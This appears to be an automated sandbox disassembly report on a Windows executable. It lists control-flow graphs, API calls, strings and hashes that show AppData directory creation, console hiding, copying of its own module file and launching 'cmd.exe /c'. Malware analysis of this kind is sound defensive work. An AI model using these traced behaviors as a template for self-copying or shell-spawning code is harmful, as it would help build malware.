a83543-a83551 6501->6507 6504->6497 6505->6467 6505->6504 6506->6500 6507->6467 6507->6506
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNEL32(?,AppData\,00000008,?,?,00B6B058,00000001,?,?,?,?,00000000), ref: 00A833B7
                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A833CD
                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A833D8
                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A833DD
                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A833E5
                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A833ED
                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A833F2
                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A833FC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateDirectory$AttributesFile
                                                                                                        • String ID: :\Users\$AppData\
                                                                                                        • API String ID: 689033430-659903382
                                                                                                        • Opcode ID: 3bf5034eec0f48c71d6db8f866418342091335d4d09ae364cb097a8e9805a22a
                                                                                                        • Instruction ID: 88f28aad4fce5bbb2c8681013488807c5fc8cf657ba2f313715c758da3b3f272
                                                                                                        • Opcode Fuzzy Hash: 3bf5034eec0f48c71d6db8f866418342091335d4d09ae364cb097a8e9805a22a
                                                                                                        • Instruction Fuzzy Hash: BDD1E431A102189FDF18EF64CD85BADBB72FF85705F10825CE409AB291DB74AB85CB50
                                                                                                        Function 00A9A6A0 Relevance: 20.9, APIs: 2, Strings: 9, Instructions: 1648COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 6607 a9a6a0-a9bdbd call aa7a00 call aa6c20 * 2 call aa12d0 call a78920 call aa6c20 * 2 call aa12d0 call a78920 call aa6c20 * 2 call aa12d0 call a78920 call aa6c20 * 2 call aa12d0 call a78920 call aa8080 call b25132 call aa1800 call b21700 6663 a9c10b-a9c111 6607->6663 6664 a9bdc3-a9bead call b21daa call b18980 call aa8b80 call aa7b00 call aa8620 6607->6664 6665 a9c13b-a9c155 call b005bb 6663->6665 6666 a9c113-a9c11f 6663->6666 6693 a9beaf-a9bec3 6664->6693 6694 a9bec5-a9bed1 6664->6694 6668 a9c131-a9c138 call b00c3c 6666->6668 6669 a9c121-a9c12f 6666->6669 6668->6665 6669->6668 6672 a9c160-a9c1ce call b25132 call b01740 GetConsoleWindow ShowWindow 6669->6672 6687 a9c269-a9c317 call aa90a0 * 4 6672->6687 6688 a9c1d4-a9c20d call aa1800 6672->6688 6734 a9c322-a9c329 6687->6734 6699 a9c210-a9c237 call aa1940 * 2 6688->6699 6697 a9bed4-a9bef4 call a73740 call aaafb0 6693->6697 6694->6697 6713 a9befa 6697->6713 6714 a9bfee-a9bffb 6697->6714 6712 a9c239-a9c264 call aa1c10 call a968a0 call aa1ac0 6699->6712 6712->6734 6719 a9bf00-a9bf17 6713->6719 6716 a9bffd-a9bfff 6714->6716 6717 a9c001-a9c025 call aa7930 call b21daa 6714->6717 6722 a9c028-a9c039 call aa7a00 6716->6722 6717->6722 6725 a9bf19-a9bf1e 6719->6725 6726 a9bf36-a9bf75 call aaa5b0 call a88240 6719->6726 6745 a9c03b-a9c060 call a73740 6722->6745 6746 a9c065-a9c0e1 call aa47b0 call ae8cbf 6722->6746 6731 a9bf24-a9bf34 6725->6731 6732 a9c156 call aa8080 6725->6732 6756 a9bf87-a9bf8d call aab5f0 6726->6756 6757 a9bf77-a9bf85 call aa12d0 6726->6757 6731->6719 6740 a9c15b call b25132 6732->6740 6743 a9c32f-a9c343 6734->6743 6744 a9c422-a9c44e call a78780 call aa13c0 6734->6744 6740->6672 6752 a9c382-a9c385 6743->6752 6753 a9c345-a9c348 6743->6753 6783 a9c510-a9c852 call a82870 GetModuleFileNameW call aa1260 call a836f0 call a83590 call aa11d0 call a749c0 call aa9b40 call aa9c10 call aa9ad0 call a749c0 * 2 call aa1090 * 2 CopyFileW call aa9b40 call aa9c10 call aa9ad0 call a749c0 * 2 call aa1090 * 2 CopyFileW call aa10a0 call aa10c0 call aaa4d0 call aa8f40 call aa9580 call aa1ac0 call aa8f40 call aa9580 call aa1ac0 call aa1660 call a78780 call aa1ac0 call aa1660 call a78780 call aa1ac0 call aa10a0 call aa10c0 call aaa4d0 call aa8f40 call aa9580 call aa1ac0 call aa1660 call a78780 call aa1ac0 call a93dd0 call a78780 call aa13c0 call aa12d0 call a83100 6744->6783 6784 a9c454-a9c50b call aa13c0 * 2 call aa1360 call aa9040 call aa9580 call aa1ac0 * 2 call aa1660 call a78780 call aa1ac0 * 2 6744->6784 6745->6746 6746->6663 6778 a9c0e3-a9c0ef 6746->6778 6760 a9c3c2-a9c3c5 6752->6760 6761 a9c387-a9c38a 6752->6761 6759 a9c350-a9c35a 6753->6759 6774 a9bf92-a9bf9c 6756->6774 6757->6774 6759->6759 6768 a9c35c-a9c37d 6759->6768 6763 a9c3fd-a9c41c SetErrorMode SetConsoleTitleW call a858e0 6760->6763 6764 a9c3c7-a9c3ca 6760->6764 6769 a9c390-a9c39a 6761->6769 6763->6744 6788 a9e585-a9e5a2 call b005bb 6763->6788 6771 a9c3d0-a9c3da 6764->6771 6768->6752 6769->6769 6776 a9c39c-a9c3bd 6769->6776 6771->6771 6779 a9c3dc-a9c3f9 6771->6779 6781 a9bf9e-a9bfb0 6774->6781 6782 a9bfd0-a9bfe8 call aaafb0 6774->6782 6776->6760 6785 a9c101-a9c108 call b00c3c 6778->6785 6786 a9c0f1-a9c0ff 6778->6786 6779->6763 6789 a9bfb2-a9bfc0 6781->6789 6790 a9bfc6-a9bfcd call b00c3c 6781->6790 6782->6714 6782->6719 6917 a9c854-a9c85b 6783->6917 6918 a9c8b6-a9c8cb call a85d90 * 2 6783->6918 6784->6783 6785->6663 6786->6740 6786->6785 6789->6740 6789->6790 6790->6782 6917->6918 6920 a9c85d-a9c864 6917->6920 6927 a9c8cd-a9c8ec call a85d90 * 2 6918->6927 6928 a9c8f2-a9ca02 call aa10a0 call aa10c0 call aaa4d0 call aa1a90 call a78a80 call aa11d0 call a749c0 call aa10a0 call aa10c0 call aaa4d0 call a78a80 call aa9d90 call aa11d0 call a749c0 * 2 call a84500 call aa12b0 6918->6928 6920->6918 6922 a9c866-a9c872 call aaafa0 6920->6922 6922->6918 6929 a9c874-a9c8b3 call aa12d0 * 2 call a792a0 6922->6929 6927->6928 6974 a9ca04-a9ca06 6928->6974 6929->6918 6975 a9cad8-a9cb15 call aa12d0 call a74a20 call a749c0 6974->6975 6976 a9ca0c-a9caca call aa9b40 call aa9c10 call aa9ad0 call aa11d0 call a749c0 * 3 call aa12d0 call a74a20 call a749c0 6974->6976 6990 a9cb92-a9cbb5 call aa9b40 6975->6990 6991 a9cb17-a9cb8d call aa9b40 call aa9c10 call aa9ad0 call aa11d0 call a749c0 * 3 6975->6991 6976->6975 7044 a9cacc-a9cad3 6976->7044 6999 a9cbbc-a9cbf0 call aa12d0 call a74a20 6990->6999 7000 a9cbb7 call a90fa0 6990->7000 6991->6990 7015 a9cc32 6999->7015 7016 a9cbf2-a9cc30 call aa12d0 call a74a20 6999->7016 7000->6999 7021 a9cc39-a9cc41 7015->7021 7016->7015 7016->7021 7026 a9cc5d-a9cc7f call a749c0 7021->7026 7027 a9cc43-a9cc57 call a749c0 7021->7027 7038 a9d02b-a9d1f1 call b18980 call aa37b0 call aa9130 call a73730 call aa3740 call b18980 call a85e60 call ab5c80 call b18980 call a9e5b0 call b18980 call a9e750 call aa0230 call ab2590 call aa0230 call ab23c0 7026->7038 7039 a9cc85-a9ccc2 call aa12d0 call a74a20 call a749c0 7026->7039 7027->7026 7114 a9d1f7-a9d200 7038->7114 7056 a9ccc4-a9ccd1 call aa11a0 7039->7056 7057 a9ccd6-a9ccdc 7039->7057 7044->6974 7056->7057 7060 a9cce0-a9ccfb call aa12d0 call a7aed0 7057->7060 7069 a9cd0d-a9d026 call b18980 call aa3b00 call aa0cc0 call aaae30 call aa3a90 call aa1bd0 * 2 call aa1400 * 2 call aa1360 call aa1b10 call aa1ac0 call aa1360 call aa1b10 call aa1ac0 call aa13c0 * 2 call aa1360 call aa16c0 call aa16e0 call aaa5b0 call aa1170 call aa11a0 call aa13c0 * 2 call aa1360 call aa16c0 call aa16e0 call aaa5b0 call aa11a0 call a77fe0 call aa1b10 call aa1ac0 call aa1a60 call aa1a90 call aa1ac0 call a749c0 call aa1ac0 call a749c0 call aa1ac0 * 4 call a7ac80 7060->7069 7070 a9ccfd 7060->7070 7251 a9d82e-a9d891 call b18980 call a776c0 call ab1ba0 call aa1260 call aa0e90 7069->7251 7072 a9ccff-a9cd02 7070->7072 7073 a9cd04-a9cd0b Sleep 7070->7073 7072->7069 7072->7073 7073->7060 7114->7114 7116 a9d202-a9d26e call a77e30 call aa1b10 call aa1ac0 call aa1360 * 2 7114->7116 7139 a9d270-a9d279 7116->7139 7139->7139 7141 a9d27b-a9d291 call aa1a90 7139->7141 7146 a9d297-a9d2a0 7141->7146 7146->7146 7148 a9d2a2-a9d2c1 call a83f00 7146->7148 7154 a9d2c6-a9d2cf 7148->7154 7154->7154 7156 a9d2d1-a9d30a call aa95d0 call aa1b10 call aa1ac0 7154->7156 7171 a9d310-a9d319 7156->7171 7171->7171 7173 a9d31b-a9d825 call aa1c10 call a77e30 call aa1b10 call aa1ac0 call b18980 call aa37b0 call aa8f40 call aa9580 call aa9470 call a73730 call aa1ac0 * 2 call aa3740 call aa10a0 call aa10c0 call aaa4d0 call b18980 call aa37b0 call aa9490 call aa9470 call aa1ac0 call aa9490 call aa9470 call aa1ac0 call aa3740 call aa1c10 call a84670 call aa9b40 call aa9c10 call aa9ad0 call a749c0 * 2 call b18980 call aa3b00 call a73730 call aa3a90 call aa12d0 call a91c90 call a7ac80 call a749c0 call aa1ac0 * 2 call a7b040 call aa1ac0 call a7b040 call aa1ac0 * 5 call a77d70 call a86020 * 2 7171->7173 7173->7251 7395 a9d829 call a7b040 7173->7395 7273 a9d8a3-a9dba9 call aa9de0 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa11d0 call a749c0 * 10 call aa1bd0 call aa1660 call b25282 call aa1bd0 call aa1660 call b25282 call aa9de0 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa11d0 call a749c0 * 8 call aa90a0 7251->7273 7274 a9d893-a9d89e call aa1170 7251->7274 7426 a9dbaf-a9dbc0 call a7f5e0 7273->7426 7427 a9dd17-a9dd28 call aa90a0 7273->7427 7274->7273 7395->7251 7432 a9e4a4-a9e580 call a78780 call aa1ac0 * 3 call a749c0 call a778d0 call a749c0 * 2 call aa1ac0 * 8 call a749c0 * 3 call aa1ac0 7426->7432 7433 a9dbc6-a9dcb7 call aa9b40 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call a749c0 * 5 call aa1090 * 2 call b259c6 7426->7433 7434 a9dd2e-a9e0a3 call a75130 * 2 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call a75330 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call a75330 7427->7434 7435 a9e450-a9e461 call aa90a0 7427->7435 7432->6788 7538 a9dcb9-a9dd00 call aa9c70 call aa11d0 call a749c0 call aa1090 * 2 call b259c6 7433->7538 7539 a9dd03-a9dd12 call a749c0 7433->7539 7624 a9e0a9-a9e42f call a75130 * 2 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call a75330 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call a75330 call a75240 * 2 7434->7624 7625 a9e434-a9e44e call a75240 * 2 7434->7625 7444 a9e491-a9e49d call a8f570 7435->7444 7445 a9e463-a9e478 call a8daf0 * 2 7435->7445 7444->7432 7459 a9e49f 7444->7459 7445->7432 7470 a9e47a-a9e48f call a8daf0 * 2 7445->7470 7459->7432 7464 a9e49f call a8f570 7459->7464 7464->7432 7470->7432 7538->7539 7539->7432 7624->7625 7625->7432
                                                                                                        APIs
                                                                                                          • Part of subcall function 00A73740: __CxxThrowException@8.LIBVCRUNTIME ref: 00A7376D
                                                                                                          • Part of subcall function 00A73740: __CxxThrowException@8.LIBVCRUNTIME ref: 00A737B2
                                                                                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00A9BB9D
                                                                                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00A9BC1E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Ios_base_dtorThrowstd::ios_base::_
                                                                                                        • String ID: ",$ ::$ ="$", $($:: $=" $X$c:\skips.txt
                                                                                                        • API String ID: 532691672-3191169177
                                                                                                        • Opcode ID: fdb2722782b45cb75cc520690f477b4a148cd6652ea42d262d15f3dbaf4bfa5b
                                                                                                        • Instruction ID: da5c17b03bdf5e94bc18421947ab3a845adcf884eae6502371f7d7d6290424f6
                                                                                                        • Opcode Fuzzy Hash: fdb2722782b45cb75cc520690f477b4a148cd6652ea42d262d15f3dbaf4bfa5b
                                                                                                        • Instruction Fuzzy Hash: 85E2F470A203499BDF14EF74CE897DDBBB1AF45308F20868DD404AB291DB75AB84CB91
                                                                                                        Function 00B24832 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 228COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 8044 b24832-b24879 GetCurrentProcess DuplicateHandle 8045 b24882-b2489f call b358de call b3723e 8044->8045 8046 b2487b-b2487d 8044->8046 8045->8046 8054 b248a1-b248af call b24c8c 8045->8054 8047 b24a50-b24a54 8046->8047 8050 b24a56-b24a59 CloseHandle 8047->8050 8051 b24a5f-b24a67 8047->8051 8050->8051 8057 b248b1-b248b3 8054->8057 8058 b248b8-b248c2 call b24acb 8054->8058 8059 b24a42-b24a47 8057->8059 8064 b248c4-b248c9 8058->8064 8065 b248cb-b248d0 8058->8065 8059->8047 8061 b24a49-b24a4f call b21daa 8059->8061 8061->8047 8066 b248d3-b248f9 call b18980 8064->8066 8065->8066 8070 b24903-b24910 8066->8070 8071 b248fb-b24901 8066->8071 8072 b24912 8070->8072 8073 b24915-b24920 8070->8073 8071->8072 8072->8073 8074 b24923-b24928 8073->8074 8074->8074 8075 b2492a-b24931 8074->8075 8076 b24934-b24939 8075->8076 8076->8076 8077 b2493b-b24940 8076->8077 8078 b24943-b24948 8077->8078 8078->8078 8079 b2494a-b24964 call b34d09 8078->8079 8082 b24a25 8079->8082 8083 b2496a-b24979 call b321c2 8079->8083 8085 b24a27-b24a39 call b34d66 * 2 8082->8085 8088 b24a68-b24a74 call b2514f 8083->8088 8089 b2497f-b24990 call b36be9 8083->8089 8085->8059 8098 b24a3b-b24a3f 8085->8098 8089->8088 8097 b24996-b249a5 call b36be9 8089->8097 8097->8088 8101 b249ab-b249b9 call b24b09 8097->8101 8098->8059 8101->8082 8104 b249bb-b249f7 CreateProcessA 8101->8104 8105 b24a00-b24a18 CloseHandle 8104->8105 8106 b249f9-b249fe 8104->8106 8107 b24a1a-b24a23 call b34d66 8105->8107 8106->8107 8107->8085
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00B2483D
                                                                                                        • DuplicateHandle.KERNELBASE(00000000,?,00000000,000000FF,00000000,00000001,00000002), ref: 00B24871
                                                                                                        • CloseHandle.KERNEL32(000000FF), ref: 00B24A59
                                                                                                          • Part of subcall function 00B2514F: IsProcessorFeaturePresent.KERNEL32(00000017,00B25121,?,?,00A71F07,?,?,00000016,?,?,00B2512E,00000000,00000000,00000000,00000000,00000000), ref: 00B25151
                                                                                                          • Part of subcall function 00B2514F: GetCurrentProcess.KERNEL32(C0000417,?,?,?), ref: 00B25173
                                                                                                          • Part of subcall function 00B2514F: TerminateProcess.KERNEL32(00000000), ref: 00B2517A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$CurrentHandle$CloseDuplicateFeaturePresentProcessorTerminate
                                                                                                        • String ID: /c $D$cmd.exe
                                                                                                        • API String ID: 1167604731-1597775715
                                                                                                        • Opcode ID: a18420b6c2736dc7382bcbb102d8683beec6395a5be1971e0a9951ea5807ef05
                                                                                                        • Instruction ID: ebf3a51b0198da9cfbe79a0c94bf801d9553cc052d50660339a80af67c65a5fd
                                                                                                        • Opcode Fuzzy Hash: a18420b6c2736dc7382bcbb102d8683beec6395a5be1971e0a9951ea5807ef05
                                                                                                        • Instruction Fuzzy Hash: 4C71F731E00619AFDB21CFA8EC45AAEBBF5EF46350F2001A9F409A7251E7319E45CF50
                                                                                                        Function 00B38AA3 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 8110 b38aa3-b38ab3 8111 b38ab5-b38ac8 call b259a0 call b259b3 8110->8111 8112 b38acd-b38acf 8110->8112 8126 b38e4f 8111->8126 8114 b38e37-b38e44 call b259a0 call b259b3 8112->8114 8115 b38ad5-b38adb 8112->8115 8133 b38e4a call b25122 8114->8133 8115->8114 8118 b38ae1-b38b0c 8115->8118 8118->8114 8121 b38b12-b38b1b 8118->8121 8124 b38b35-b38b37 8121->8124 8125 b38b1d-b38b30 call b259a0 call b259b3 8121->8125 8129 b38e33-b38e35 8124->8129 8130 b38b3d-b38b41 8124->8130 8125->8133 8132 b38e52-b38e57 8126->8132 8129->8132 8130->8129 8131 b38b47-b38b4b 8130->8131 8131->8125 8135 b38b4d-b38b64 8131->8135 8133->8126 8138 b38b81-b38b8a 8135->8138 8139 b38b66-b38b69 8135->8139 8143 b38ba8-b38bb2 8138->8143 8144 b38b8c-b38ba3 call b259a0 call b259b3 call b25122 8138->8144 8141 b38b73-b38b7c 8139->8141 8142 b38b6b-b38b71 8139->8142 8145 b38c1d-b38c37 8141->8145 8142->8141 8142->8144 8147 b38bb4-b38bb6 8143->8147 8148 b38bb9-b38bd7 call b35b94 call b34d66 * 2 8143->8148 8175 b38d6a 8144->8175 8151 b38d0b-b38d14 call b3fc47 8145->8151 8152 b38c3d-b38c4d 8145->8152 8147->8148 8179 b38bf4-b38c1a call b38ff6 8148->8179 8180 b38bd9-b38bef call b259b3 call b259a0 8148->8180 8164 b38d87 8151->8164 8165 b38d16-b38d28 8151->8165 8152->8151 8153 b38c53-b38c55 8152->8153 8153->8151 8157 b38c5b-b38c81 8153->8157 8157->8151 8161 b38c87-b38c9a 8157->8161 8161->8151 8166 b38c9c-b38c9e 8161->8166 8168 b38d8b-b38da3 ReadFile 8164->8168 8165->8164 8170 b38d2a-b38d39 GetConsoleMode 8165->8170 8166->8151 8171 b38ca0-b38ccb 8166->8171 8173 b38da5-b38dab 8168->8173 8174 b38dff-b38e0a GetLastError 8168->8174 8170->8164 8176 b38d3b-b38d3f 8170->8176 8171->8151 8178 b38ccd-b38ce0 8171->8178 8173->8174 8183 b38dad 8173->8183 8181 b38e23-b38e26 8174->8181 8182 b38e0c-b38e1e call b259b3 call b259a0 8174->8182 8177 b38d6d-b38d77 call b34d66 8175->8177 8176->8168 8184 b38d41-b38d5b ReadConsoleW 8176->8184 8177->8132 8178->8151 8188 b38ce2-b38ce4 8178->8188 8179->8145 8180->8175 8185 b38d63-b38d69 call b2597d 8181->8185 8186 b38e2c-b38e2e 8181->8186 8182->8175 8192 b38db0-b38dc2 8183->8192 8193 b38d5d GetLastError 8184->8193 8194 b38d7c-b38d85 8184->8194 8185->8175 8186->8177 8188->8151 8197 b38ce6-b38d06 8188->8197 8192->8177 8201 b38dc4-b38dc8 8192->8201 8193->8185 8194->8192 8197->8151 8205 b38de1-b38dec 8201->8205 8206 b38dca-b38dda call b387bf 8201->8206 8207 b38df8-b38dfd call b385ff 8205->8207 8208 b38dee call b3890f 8205->8208 8215 b38ddd-b38ddf 8206->8215 8216 b38df3-b38df6 8207->8216 8208->8216 8215->8177 8216->8215
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3907804496
                                                                                                        • Opcode ID: 5751a52ed5f0d7fbb0f78e401fd9c2d7b5d1df585cffb27fa1e35e33dcaae405
                                                                                                        • Instruction ID: bd18538ab1955801852d3dc603f0871a5977c3e6178985ed1a0ac22aea4e7577
                                                                                                        • Opcode Fuzzy Hash: 5751a52ed5f0d7fbb0f78e401fd9c2d7b5d1df585cffb27fa1e35e33dcaae405
                                                                                                        • Instruction Fuzzy Hash: 25C19170E04359AFDB11DFA8D881BADBBF0AF19310F2841D9F454A7392CB759941CB62
                                                                                                        Function 00B40690 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 8218 b40690-b406c0 call b403f3 8221 b406c2-b406cd call b259a0 8218->8221 8222 b406db-b406e7 call b3cc7e 8218->8222 8229 b406cf-b406d6 call b259b3 8221->8229 8227 b40700-b40749 call b4035e 8222->8227 8228 b406e9-b406fe call b259a0 call b259b3 8222->8228 8237 b407b6-b407bf GetFileType 8227->8237 8238 b4074b-b40754 8227->8238 8228->8229 8239 b409b2-b409b8 8229->8239 8240 b407c1-b407f2 GetLastError call b2597d CloseHandle 8237->8240 8241 b40808-b4080b 8237->8241 8243 b40756-b4075a 8238->8243 8244 b4078b-b407b1 GetLastError call b2597d 8238->8244 8240->8229 8255 b407f8-b40803 call b259b3 8240->8255 8247 b40814-b4081a 8241->8247 8248 b4080d-b40812 8241->8248 8243->8244 8249 b4075c-b40789 call b4035e 8243->8249 8244->8229 8252 b4081e-b4086c call b3cbc7 8247->8252 8253 b4081c 8247->8253 8248->8252 8249->8237 8249->8244 8260 b4087c-b408a0 call b40111 8252->8260 8261 b4086e-b40870 call b4056f 8252->8261 8253->8252 8255->8229 8268 b408a2 8260->8268 8269 b408b3-b408f6 8260->8269 8265 b40875-b4087a 8261->8265 8265->8260 8267 b408a4-b408ae call b3595d 8265->8267 8267->8239 8268->8267 8271 b40917-b40925 8269->8271 8272 b408f8-b408fc 8269->8272 8275 b409b0 8271->8275 8276 b4092b-b4092f 8271->8276 8272->8271 8274 b408fe-b40912 8272->8274 8274->8271 8275->8239 8276->8275 8277 b40931-b40964 CloseHandle call b4035e 8276->8277 8280 b40966-b40992 GetLastError call b2597d call b3cd90 8277->8280 8281 b40998-b409ac 8277->8281 8280->8281 8281->8275
                                                                                                        APIs
                                                                                                          • Part of subcall function 00B4035E: CreateFileW.KERNEL32(00000000,00000000,?,00B40739,?,?,00000000,?,00B40739,00000000,0000000C), ref: 00B4037B
                                                                                                        • GetLastError.KERNEL32 ref: 00B407A4
                                                                                                        • __dosmaperr.LIBCMT ref: 00B407AB
                                                                                                        • GetFileType.KERNEL32(00000000), ref: 00B407B7
                                                                                                        • GetLastError.KERNEL32 ref: 00B407C1
                                                                                                        • __dosmaperr.LIBCMT ref: 00B407CA
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B407EA
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00B40934
                                                                                                        • GetLastError.KERNEL32 ref: 00B40966
                                                                                                        • __dosmaperr.LIBCMT ref: 00B4096D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                        • String ID: H
                                                                                                        • API String ID: 4237864984-2852464175
                                                                                                        • Opcode ID: 8c1b3c876411467e4c6458372c6b9c8d8f48292fbc6ff881cd6e9ece8921009b
